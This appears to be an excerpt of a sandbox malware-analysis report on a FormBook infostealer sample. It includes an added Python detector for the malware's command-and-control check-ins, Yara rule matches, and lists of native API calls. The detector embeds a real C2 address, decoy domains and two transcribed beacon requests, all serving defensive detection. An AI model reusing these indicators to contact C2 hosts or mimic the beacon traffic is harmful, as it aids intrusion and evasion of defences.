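The traffic above is the kind of thing a proxy-log or PCAP detector can key on without a host list, because the decoy hosts rotate while the path, the missing User-Agent and the short NUL body do not. The following is an added example, not Joe Sandbox code: CONFIG is a subset of the extracted configuration (the C2 entry plus the three decoy domains that appear in this capture), REQ_1 and REQ_2 are transcribed from the two GET requests in the report with the seven NUL bytes shown as "Data Raw", BENIGN is constructed, and the scoring threshold in is_checkin() is an assumption. Hosts are normalised by stripping "www." because the configuration lists bare domains while the requests use www-prefixed ones.

```python
"""Detect the FormBook check-in pattern recorded in the Networking section.

Added example.  The two malicious requests are transcribed from the report;
the benign request and the scoring threshold are constructed assumptions.
"""
from dataclasses import dataclass

# Subset of the extracted configuration (C2 entry + decoys seen in traffic).
CONFIG = {
    "C2 list": ["www.boxberry-my.com/sn31/"],
    "decoy": ["informacion-numero-24-h.site", "tzjisheng.com", "rodosmail.xyz"],
}

REQ_1 = (b"GET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1\r\n"
         b"Host: www.informacion-numero-24-h.site\r\nConnection: close\r\n\r\n" + b"\x00" * 7)
REQ_2 = (b"GET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1\r\n"
         b"Host: www.tzjisheng.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7)
BENIGN = (b"GET /sn31/index.html HTTP/1.1\r\nHost: www.example.com\r\n"
          b"User-Agent: curl/8.0\r\nConnection: close\r\n\r\n")  # constructed


def norm_host(host):
    """Lower-case and drop a leading 'www.' so traffic hosts match config entries."""
    host = host.strip().lower()
    return host[4:] if host.startswith("www.") else host


@dataclass(frozen=True)
class Profile:
    path: str          # URI path from the C2 entry, e.g. "/sn31/"
    hosts: frozenset   # normalised C2 host + decoy domains


def profile_from_config(cfg):
    c2_host, _, c2_path = cfg["C2 list"][0].partition("/")
    hosts = frozenset(norm_host(h) for h in [c2_host, *cfg["decoy"]])
    return Profile(path="/" + c2_path, hosts=hosts)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, params, headers, body).

    Query values are kept verbatim (no percent/plus decoding) so they can be
    compared across requests exactly as they were sent.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    return method, path, params, headers, body


def indicators(raw, prof):
    """Names of the check-in traits present in one request."""
    method, path, _, headers, body = parse_request(raw)
    found = []
    if path == prof.path:
        found.append("c2_path")
    if norm_host(headers.get("host", "")) in prof.hosts:
        found.append("host_in_config")
    if "user-agent" not in headers:
        found.append("no_user_agent")
    if method == "GET" and body and not body.strip(b"\x00"):
        found.append("get_with_nul_body")
    return found


def is_checkin(raw, prof):
    """Assumed threshold: the C2 path plus at least one more trait."""
    found = indicators(raw, prof)
    return "c2_path" in found and len(found) >= 2


def shared_query_values(raws, prof):
    """Query parameters whose name and value are identical across all check-ins."""
    shared = None
    for raw in raws:
        if not is_checkin(raw, prof):
            continue
        items = set(parse_request(raw)[2].items())
        shared = items if shared is None else shared & items
    return dict(shared or ())


if __name__ == "__main__":
    prof = profile_from_config(CONFIG)
    for req in (REQ_1, REQ_2, BENIGN):
        print(parse_request(req)[3].get("host"), indicators(req, prof), is_checkin(req, prof))
    print(shared_query_values([REQ_1, REQ_2, BENIGN], prof))
```

The shared parameter the last function returns (3fK84j=bDKp2PCxjp9Dyht0 in this capture) is a useful pivot for grouping beacons from one infected host across its rotating decoy domains; the report does not say what the value encodes, so treat it as an opaque correlation key.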

          E-Banking Fraud

Source: Yara match | File sources: the same 9 unpacked-PE and 11 memory-dump sources listed under AV Detection (Yara detected FormBook)

          System Summary

Matched Yara rules (each of the 20 sources listed below matched both):
  • Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Sources, type: UNPACKEDPE
  • 2.2.idczzzzbpy.exe.400000.1.raw.unpack
  • 1.2.idczzzzbpy.exe.700000.1.unpack
  • 2.0.idczzzzbpy.exe.400000.7.unpack
  • 2.0.idczzzzbpy.exe.400000.9.raw.unpack
  • 2.0.idczzzzbpy.exe.400000.7.raw.unpack
  • 1.2.idczzzzbpy.exe.700000.1.raw.unpack
  • 2.0.idczzzzbpy.exe.400000.5.unpack
  • 2.0.idczzzzbpy.exe.400000.9.unpack
  • 2.2.idczzzzbpy.exe.400000.1.unpack
Sources, type: MEMORY
  • 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp
  • 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  • 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  • 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp
  • 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp
  • 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp
  • 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp
  • 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp
  • 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  • 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp
  • 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp
Source: inlaww321345.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 053BB150 appears 48 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: String function: 003B4599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: String function: 0166B150 appears 136 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: String function: 003B2400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A360 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A410 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A490 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A35A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A45A NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A492 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A53A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AB040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A95F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AA770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AA710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9610 NtEnumerateValueKey,
